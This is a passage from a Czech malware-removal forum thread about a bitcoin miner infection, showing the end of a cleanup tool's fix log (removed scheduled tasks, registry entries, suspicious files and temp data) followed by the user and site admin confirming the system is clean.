C:\WINDOWS\System32\Tasks\{C1E14D40-9F1F-EBBD-1E08-51865EAFA95A} => moved successfully
C:\ProgramData\ext.dat => moved successfully
"C:\ProgramData\ext.dat" => not found
"C:\ProgramData\lock.dat" => not found
"C:\ProgramData\ts.dat" => not found
C:\Users\ulol\AppData\Local\UeaYTEArbi.exe => moved successfully
C:\Users\ulol\AppData\Local\Temp => moved successfully
"HKLM\Software\Classes\Directory\Background\ShellEx\ContextMenuHandlers\igfxcui" => removed successfully
HKLM\Software\Classes\CLSID\{3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{B0400B46-4EE3-44BE-9C04-F436BEF5665F}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B0400B46-4EE3-44BE-9C04-F436BEF5665F}" => removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UNP\RunCampaignManager => not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{31EC4593-383C-4B64-9941-178C628FAEAF}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{31EC4593-383C-4B64-9941-178C628FAEAF}" => removed successfully
"C:\WINDOWS\System32\Tasks\kuaejfar" => not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\kuaejfar" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{7D591FD9-73EA-4790-8E68-404BAF098DDE}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7D591FD9-73EA-4790-8E68-404BAF098DDE}" => removed successfully
"C:\WINDOWS\System32\Tasks\{C1E14D40-9F1F-EBBD-1E08-51865EAFA95A}" => not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{C1E14D40-9F1F-EBBD-1E08-51865EAFA95A}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{0273991C-90F1-49BB-A997-73BF1C769F3D}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0273991C-90F1-49BB-A997-73BF1C769F3D}" => removed successfully
"C:\WINDOWS\System32\Tasks\gcknyzn" => not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\gcknyzn" => removed successfully
"C:\Users\ulol\AppData\Roaming\product.dll" => not found
"C:\Users\ulol\AppData\Local\Temp\is-7QKIU.tmp\installer.tmp" => not found
Hosts restored successfully.

=========== EmptyTemp: ==========

BITS transfer queue => 10510336 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 67849688 B
Java, Flash, Steam htmlcache => 1243 B
Windows/system/drivers => 426182573 B
Edge => 1858418 B
Chrome => 813142935 B
Firefox => 264735320 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 19070 B
LocalService => 0 B
NetworkService => 410114 B
NetworkService => 0 B
defaultuser0 => 7168 B
ulol => 4353724 B

RecycleBin => 49348547671 B
EmptyTemp: => 47.4 GB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 11:30:15 ====


Nahoru
 Profil  
 
 Předmět příspěvku: Re: bitcoin miner
PříspěvekNapsal: 12 led 2019 11:53 
Offline
Návštěvník
Návštěvník

Registrován: 10 úno 2012 14:30
Příspěvky: 8
Antimalware již jde spustit. Vypadá to, že jsme uspěli!


Nahoru
 Profil  
 
 Předmět příspěvku: Re: bitcoin miner
PříspěvekNapsal: 12 led 2019 12:49 
Offline
Site Admin
Site Admin
Uživatelský avatar

Registrován: 30 říj 2003 13:42
Příspěvky: 107885
Bydliště: Plzeň
Byly tam zbytky po šmejdech. To jsem rád! :)

_________________
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.

Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.

Navštivte: Obrázek

e-mail: rudy(zavináč)forum.viry.cz

Varování:
Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!


Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.


Nahoru
 Profil  
 
 Předmět příspěvku: Re: bitcoin miner
PříspěvekNapsal: 12 led 2019 12:50 
Offline
Návštěvník
Návštěvník

Registrován: 10 úno 2012 14:30
Příspěvky: 8
Pokud je to vše, tak Vám vřele děkuji :)


Nahoru
 Profil  
 
 Předmět příspěvku: Re: bitcoin miner
PříspěvekNapsal: 12 led 2019 16:54 
Offline
Site Admin
Site Admin
Uživatelský avatar

Registrován: 30 říj 2003 13:42
Příspěvky: 107885
Bydliště: Plzeň
Z mé strany je to vše a vy nemáte zač! :)

_________________
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.

Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.

Navštivte: Obrázek

e-mail: rudy(zavináč)forum.viry.cz

Varování:
Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!


Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.


Nahoru
 Profil  
 
Zobrazit příspěvky za předchozí:  Seřadit podle  
Odeslat nové téma Toto téma je zamknuté. Nemůžete posílat nové příspěvky ani odpovídat na starší.  [ Příspěvků: 9 ] 

Všechny časy jsou v UTC + 1 hodina


Kdo je online

Uživatelé procházející toto fórum: Google [Bot]


Nemůžete zakládat nová témata v tomto fóru
Nemůžete odpovídat v tomto fóru
Nemůžete upravovat své příspěvky v tomto fóru
Nemůžete mazat své příspěvky v tomto fóru
Nemůžete přikládat soubory v tomto fóru

Hledat:
Přejít na:  
Založeno na phpBB® Forum Software © phpBB Group
Český překlad – phpBB.cz
Přispějete na provoz fóra?
>